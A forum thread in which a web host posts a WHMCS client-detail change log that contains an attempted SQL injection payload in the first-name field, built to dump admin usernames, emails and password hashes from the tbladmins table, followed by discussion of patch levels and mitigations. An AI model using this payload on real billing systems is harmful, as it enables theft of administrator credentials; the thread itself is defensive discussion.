New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
WHMCS Still have security issues? I found This
Megahosting
Member
in General
A few minutes some person was register in my site and put this in the personal data.
Client ID: 2467 - Innocent baba has requested to change his/her details as indicated below:
First Name: 'Innocent' to 'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)'
Last Name: 'baba' to '1'
Company Name: 'asdfasdf' to '1'
Address 1: 'aad' to '1'
Address 2: 'adfa' to '1'
City: 'aaaaaa' to '1'
State: 'Berlin' to '1'
Country: 'DE' to 'US'
Phone Number: '01 1111111111' to '1'
Default Payment Method: '' to ''
Comments
Looks like someone trying to exploit one of the vulnerabilities that has come to light in the past few weeks but has since been patched. There's no reason to think this is a new issue, unless anyone else spots anything new about this. (Just because people are trying to exploit a vulnerability, it doesn't mean WHMCS is still vulnerable to it - it just means their attempt will fail).
Are you running 5.2.10?
phew! i thought it was another new exploit..
That's a relief...
yes im running the lastest. Still no answer from whmcs team about that> @JamesOakley said:
I have people doing this all the time, nothing will happen (i hope..)
nothing would happen
that user try to exploit bugs on 5.2.8 version. if that bugs success his firstname would change to all your whmcs admin username, email and password
WHMCS answer no problem and i need ban that ip address for security LOL
Why not just disable the changing of the name? Shuts down any possiblility of this or modified similar exploits from working. I think they have to register a legit looking name first otherwise it doesn't get past the internal checks.
Why just name? Any updatable field works judging from the old code.
As far as I know you have to have they key statement in the first name field.
The vulnerability is on the update query creation function, not on updating the first name. While the specific exploit code released relies on changing account details, the vulnerability can still obviously be exploited in other parts of the code that use any sort of user input.
Of course, you might not be able to get user details. But you'd still be able to update all tickets if you use the exploit when opening a ticket, etc.
If you only care about blocking script kiddies then restricting changing of client information is okay. But if you're serious about security then that's a ridiculous attack prevention mechanism, although it'd still certainly curb down the chance of an attack a lot if localhost.re continues to use firstname updates in their proof of concepts.
Guess you should tell that to all the people banging away at my WHMCS installs trying to change the first name then giving up when they find out they can't. Not a single person has tried to add it to a different field. What does that prove? Not much but a lot more then your statement proves.
So once again. Show me the proof to back up your claims.
The nature of the exploit makes it obvious to anyone who knows a bit about web application security and/or SQL injections that it can be used in the same way on other queries. If you're at all serious about security you should be more concerned with verifying that an application is secure rather than verifying that it is insecure.
Same here
[email protected]
We had someone weeks back signup and put false data in but turns out was a legit customer. They simply wanted to hide their identity. However, we directed them to our TOS/AUP and they corrected their profile.
It is probably best for everyone to simply lock client fields for the time being. I am curious about what the future holds for WHMCS.
If you are "serious about security" why haven't you done any penetration testing?
x
We are currently working on an free software billing panel to replace our WHMCS installation.
Until then please share your penetration testing results with the community. We can all use the info from people such as yourself who are "serious about security" because they know how to to google 'SQL injection'.